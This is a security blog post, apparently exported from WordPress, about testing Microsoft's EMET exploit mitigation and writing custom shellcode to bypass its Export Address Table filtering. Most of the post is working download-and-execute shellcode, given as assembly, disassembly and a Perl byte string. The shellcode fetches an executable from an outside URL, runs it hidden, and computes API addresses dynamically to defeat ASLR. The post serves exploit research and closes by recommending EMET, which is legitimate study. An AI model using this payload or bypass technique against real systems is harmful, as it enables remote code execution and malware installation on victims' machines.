Recently I have been testing out Microsoft’s “Enhanced Mitigation Experience Toolkit” (EMET) tool for exploit mitigation. This is a free tool and is designed to harden or secure applications without having to recode them. One exploit I used to test was Adobe Flash’s “Action script type confusion” vulnerability (CVE-2010-3654). This vulnerability affects version 10.1.53.64 and below. I used the exploit downloaded from www.Abyssec.com. This exploit worked perfectly on a fully patched Windows 7 supporting hardware DEP set to OptOut on Internet Explorer 8 with Adobe Flash version 10.1.53.64<\/p>\n
After enabling EMET on the Internet Explorer executable iexplore.exe and testing again this time broke the exploit. Disabling the mitigation feature “Export Address Table Access Filtering” (EAF) on the process now exploited successfully proving that’s EMET’s EAF was mitigating the shellcode from execution.<\/p>\n
In order to do something “useful”, shellcode generally needs to call Windows APIs. However, in order to call an API, shellcode must first find the address where that API has been loaded. To do this the vast majority of shellcode iterates through the export address table of all loaded modules, looking for modules that contain useful APIs. Typically this involves kernel32.dll or ntdll.dll. Once an interesting module has been found, the shellcode can then figure out the address where an API in that module resides. This mitigation filters accesses to the Export Address Table (EAT), allowing or disallowing the read\/write access based on the calling code. With EMET in place, most of today\u2019s shellcode will be blocked when it tries to lookup the APIs needed for its payload.<\/p><\/blockquote>\n
I see EMET’s EAF being a great feature as even having a system that supports DEP and ALSR, EAF will be another hurdle to get round to exploit successfully. Berend-Jan Wever wrote an article last year showing how to bypass EAF but I thought I’d write my own custom shellcode to bypass EAF. For this example I’ll use the RemoteExec exploit published in my last post. Soon as I protected RemoteExec.exe with EMET my existing exploit broke so my new shellcode will now call the required API’s directly.<\/p>\n
Below is my custom asm code which downloads and executes box.exe which I started first with static addresses . The addresses used in this asm code are from a Windows XP SP3 machine.<\/p>\n
To assemble our code we run<\/p>\n
>nasmw -f bin -o urldownexe.bin urldownexe.asm<\/pre>\n[BITS 32]\r\n;\r\nPUSH 0x00206c6c\r\nPUSH 0x642e6e6f\r\nPUSH 0x6d6c7275\r\nMOV EBX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer \"urlmon.dll\" in EBX\r\nPUSH EBX\r\nMOV EAX,0x7C801D7B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nCALL EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; LoadLibraryA\r\n;\r\nPUSH 0x00657865\r\nPUSH 0x2e786f62\r\nMOV EBX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer \"box.exe\" in EBX\r\n;\r\nPUSH 0x00206578\r\nPUSH 0x652e786f\r\nPUSH 0x62737365\r\nPUSH 0x6d2f736c\r\nPUSH 0x6f6f742f\r\nPUSH 0x74656e2e\r\nPUSH 0x72656b63\r\nPUSH 0x61687461\r\nPUSH 0x68796572\r\nPUSH 0x672e7777\r\nPUSH 0x772f2f3a\r\nPUSH 0x70747468\r\nMOV ECX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer to in ECX\r\n;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; http:\/\/www.greyhathacker.net\/tools\/messbox.exe\r\nXOR EDX,EDX\r\nPUSH EDX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; put parameters on the stack\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nPUSH EDX\r\nPUSH EBX\r\nPUSH ECX\r\nPUSH EDX\r\n;\r\nMOV EAX,0x781C4868\r\nCALL EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; URLDownloadToFileA\r\n;\r\nPUSH 0x00657865\r\nPUSH 0x2e786f62\r\nMOV\u00a0 EAX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer \"box.exe\" in EAX\r\nXOR EBX,EBX\r\nPUSH EBX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nPUSH EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nMOV EAX,0x7c86250d\u00a0 ; WinExec\r\nCALL EAX\r\n;\r\nXOR EAX,EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nPUSH EAX\r\nMOV EAX,0x7c81CB12\r\nCALL EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; ExitProcess<\/pre>\nTo get our opcodes we run<\/p>\n
>ndisasmw urldownexe.bin -b 32<\/pre>\n00000000\u00a0 686C6C2000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x206c6c\r\n00000005\u00a0 686F6E2E64\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x642e6e6f\r\n0000000A\u00a0 6875726C6D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x6d6c7275\r\n0000000F\u00a0 89E3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov ebx,esp\r\n00000011\u00a0 53\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ebx\r\n00000012\u00a0 B87B1D807C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c801d7b\r\n00000017\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000019\u00a0 6865786500\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x657865\r\n0000001E\u00a0 68626F782E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x2e786f62\r\n00000023\u00a0 89E3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov ebx,esp\r\n00000025\u00a0 6878652000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x206578\r\n0000002A\u00a0 686F782E65\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x652e786f\r\n0000002F\u00a0 6865737362\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x62737365\r\n00000034\u00a0 686C732F6D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x6d2f736c\r\n00000039\u00a0 682F746F6F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x6f6f742f\r\n0000003E\u00a0 682E6E6574\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x74656e2e\r\n00000043\u00a0 68636B6572\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x72656b63\r\n00000048\u00a0 6861746861\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x61687461\r\n0000004D\u00a0 6872657968\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x68796572\r\n00000052\u00a0 6877772E67\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x672e7777\r\n00000057\u00a0 683A2F2F77\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x772f2f3a\r\n0000005C\u00a0 6868747470\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x70747468\r\n00000061\u00a0 89E1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov ecx,esp\r\n00000063\u00a0 31D2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor edx,edx\r\n00000065\u00a0 52\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push edx\r\n00000066\u00a0 52\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push edx\r\n00000067\u00a0 53\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ebx\r\n00000068\u00a0 51\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ecx\r\n00000069\u00a0 52\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push edx\r\n0000006A\u00a0 B868481C78\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x781c4868\r\n0000006F\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000071\u00a0 6865786500\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x657865\r\n00000076\u00a0 68626F782E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x2e786f62\r\n0000007B\u00a0 89E0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,esp\r\n0000007D\u00a0 31DB\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor ebx,ebx\r\n0000007F\u00a0 53\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ebx\r\n00000080\u00a0 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push eax\r\n00000081\u00a0 B80D25867C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c86250d\r\n00000086\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000088\u00a0 31C0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor eax,eax\r\n0000008A\u00a0 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push eax\r\n0000008B\u00a0 B812CB817C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c81cb12\r\n00000090\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax<\/pre>\nFinally to test our shellcode we can use Berend’s testival.exe tool<\/p>\n
>w32-testival [$]=ascii:urldownexe.bin eip=$ --verbose --eh --eh<\/pre>\n![\"\"](\"\/images\/pwned.png\")
\u00a0<\/p>\n
Now that we know our code works what I needed to do now was to make sure that the addresses used were dynamicly created as hardcoded addresses would not work for Windows 7 due to ASLR (i.e. addresses would change at next boot) plus I had to avoid the bad characters for this exploit. Even though writing custom shellcode might take a bit of time, after writing a ROP exploit writing custom shellcode seemed relatively easy \ud83d\ude42<\/p>\n
Below is my completed shellcode that can be used on RemoteExec for Windows 7 with EMET enabled on the process. The key to this exploit was that we had obtained our kernel pointer in our last exploit which then we worked out the VirtualProtect API address and stored it in ESI. With this in mind I used the value of ESI and calculated our API addresses, LoadLibrary, URLDownloadToFileA, WinExec, etc.<\/p>\n
my $shellcode =\r\n#\r\n# LoadLibraryA(\"urlmon.dll\");\r\n#\r\n\"\\x68\\x6c\\x6c\\x00\\x00\".\u00a0\u00a0\u00a0 # push dword 0x206c6c\u00a0\u00a0# badchar 0x20 -> 0x00\r\n\"\\x68\\x6f\\x6e\\x2e\\x64\".\u00a0\u00a0\u00a0 # push dword 0x642e6e6f\r\n\"\\x68\\x75\\x72\\x6c\\x6d\".\u00a0\u00a0\u00a0 # push dword 0x6d6c7275\r\n\"\\x89\\xE3\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov ebx,esp\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\r\n\"\\x89\\xF0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov eax,esi\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# esi = VirtualProtect\r\n\"\\x05\\x98\\xb0\\x00\\x00\".\u00a0\u00a0\u00a0 # add eax,0xB098\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# eax = LoadLibrary\r\n\"\\xFF\\xD0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# LoadLibrary\r\n#\r\n# box.exe - place in current folder\r\n#\r\n\"\\x68\\x65\\x78\\x65\\x00\".\u00a0\u00a0\u00a0 # push dword 0x00657865\r\n\"\\x68\\x62\\x6f\\x78\\x2e\".\u00a0\u00a0\u00a0 # push dword 0x2e786f62\r\n\"\\x89\\xE3\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov ebx,esp\r\n#\r\n# http:\/\/www.greyhathacker.net\/tools\/messbox.exe\r\n#\r\n\"\\x68\\x78\\x65\\x00\\x00\".\u00a0\u00a0\u00a0 # push dword 0x206578\u00a0\u00a0# badchar 0x20 -> 0x00\r\n\"\\x68\\x6F\\x78\\x2E\\x65\".\u00a0\u00a0\u00a0 # push dword 0x652e786f\r\n\"\\x68\\x65\\x73\\x73\\x62\".\u00a0\u00a0\u00a0 # push dword 0x62737365\r\n\"\\x68\\x6C\\x73\\x2F\\x6D\".\u00a0\u00a0\u00a0 # push dword 0x6d2f736c\r\n\"\\x68\\x2F\\x74\\x6F\\x6F\".\u00a0\u00a0\u00a0 # push dword 0x6f6f742f\r\n\"\\x68\\x2E\\x6E\\x65\\x74\".\u00a0\u00a0\u00a0 # push dword 0x74656e2e\r\n\"\\x68\\x63\\x6B\\x65\\x72\".\u00a0\u00a0\u00a0 # push dword 0x72656b63\r\n\"\\x68\\x61\\x74\\x68\\x61\".\u00a0\u00a0\u00a0 # push dword 0x61687461\r\n\"\\x68\\x72\\x65\\x79\\x68\".\u00a0\u00a0\u00a0 # push dword 0x68796572\r\n\"\\x68\\x77\\x77\\x2E\\x67\".\u00a0\u00a0\u00a0 # push dword 0x672e7777\r\n\"\\x68\\x3A\\x2F\\x2F\\x77\".\u00a0\u00a0\u00a0 # push dword 0x772f2f3a\r\n\"\\x68\\x68\\x74\\x74\\x70\".\u00a0\u00a0\u00a0 # push dword 0x70747468\r\n\"\\x89\\xE1\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov ecx,esp\r\n#\r\n\"\\x31\\xD2\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # xor edx,edx\r\n\"\\x52\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push edx\u00a0 - Arg5\r\n\"\\x52\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push edx\u00a0 - Arg4\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0 - Arg3\r\n\"\\x51\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ecx\u00a0 - Arg2\r\n\"\\x52\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push edx\u00a0 - Arg1\r\n#\r\n# URLDownloadToFileA(\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 NULL,\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"http:\/\/www.greyhathacker.net\/tools\/messbox.exe\",\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"box.exe\",\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0,\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 NULL);\r\n#\r\n# At this point eax contains base address of urlmon.dll 0x75bf0000\r\n# Adding 0x96DC8 becomes pointer to URLDownloadToFileA address\r\n#\r\n\"\\x05\\xc8\\x6d\\x08\\x00\".\u00a0\u00a0\u00a0 # add eax,0x86DC8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# remove bad char 0x09\r\n\"\\x05\\x00\\x00\\x01\\x00\".\u00a0\u00a0\u00a0 # add eax,0x10000\u00a0\u00a0# eax = URLDownloadToFileA\r\n\"\\xFF\\xD0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # URLDownloadToFileA\r\n#\r\n# WinExec(\"box.exe\", 0);\r\n#\r\n\"\\x68\\x65\\x78\\x65\\x00\".\u00a0\u00a0\u00a0 # push dword 0x00657865\r\n\"\\x68\\x62\\x6f\\x78\\x2e\".\u00a0\u00a0\u00a0 # push dword 0x2e786f62\r\n\"\\x8B\\xC4\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov\u00a0 eax,esp\r\n\"\\x31\\xDB\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # xor ebx,ebx\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # ShowState = SW_HIDE\r\n\"\\x50\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # CmdLine = box.exe\r\n\"\\x89\\xF0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov eax,esi\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # esi = VirtualProtect\r\n\"\\x05\\xe5\\xc1\\x04\\x00\".\u00a0\u00a0\u00a0 # add eax,0x4C1E5\u00a0\u00a0\u00a0\u00a0\u00a0 # eax = WinExec\r\n\"\\xFF\\xD0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# WinExec\r\n#\r\n# ExitProcess(0);\r\n#\r\n\"\\x31\\xC0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # xor eax,eax\r\n\"\\x50\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push eax\r\n\"\\x89\\xF0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov eax,esi\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# esi = VirtualProtect\r\n\"\\x05\\x15\\x90\\x01\\x00\".\u00a0\u00a0\u00a0 # add eax,0x19015\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# eax = ExitProcess\r\n\"\\xFF\\xD0\";\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# ExitProcess<\/pre>\nPeter Van Eeckhoutte’s exploit writing tutorial “Exploit writing tutorial part 9 : Introduction to Win32 shellcoding” contains a cool perl script written by Peter that does all the hard work of converting our ascii string into push instructions in reverse order, brilliant \ud83d\ude42<\/p>\n
EMET is superb tool to have installed and would recommend it to anyone as it will mitigate a number of shellcode based exploits. One thing I would like to see in EMET is the ability to alert the user or have some sort of logging to tell us if shellcode was encountered. This would be useful to discover 0-day exploits out there if we inadvertently got hit by a drive by attack.<\/p>\n
References:<\/p>\n
http:\/\/blogs.technet.com\/b\/srd\/archive\/tags\/emet\/<\/a>
\nhttp:\/\/skypher.com\/index.php\/2010\/11\/17\/bypassing-eaf\/<\/a>
\nhttp:\/\/www.adobe.com\/support\/security\/advisories\/apsa10-05.html<\/a>
\nhttp:\/\/www.abysssec.com\/blog\/2011\/04\/18\/exploiting-adobe-flash-player-on-windows-7\/<\/a>
\nhttp:\/\/www.corelan.be\/index.php\/2010\/02\/25\/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Recently I have been testing out Microsoft’s “Enhanced Mitigation Experience Toolkit” (EMET) tool for exploit mitigation. This is a free tool and is designed to harden or secure applications without having to recode them. One exploit I used to test was Adobe Flash’s “Action script type confusion” vulnerability (CVE-2010-3654). This vulnerability affects version 10.1.53.64 and […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,7,6],"tags":[33,31],"class_list":["post-483","post","type-post","status-publish","format-standard","hentry","category-all","category-exploits","category-vulnerabilities","tag-emet","tag-remoteexec"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=483"}],"version-history":[{"count":16,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/483\/revisions"}],"predecessor-version":[{"id":695,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/483\/revisions\/695"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"\/images\/emet.png\")
<\/p>\n![\"\"](\"\/images\/emetconfig.png\")
<\/p>\n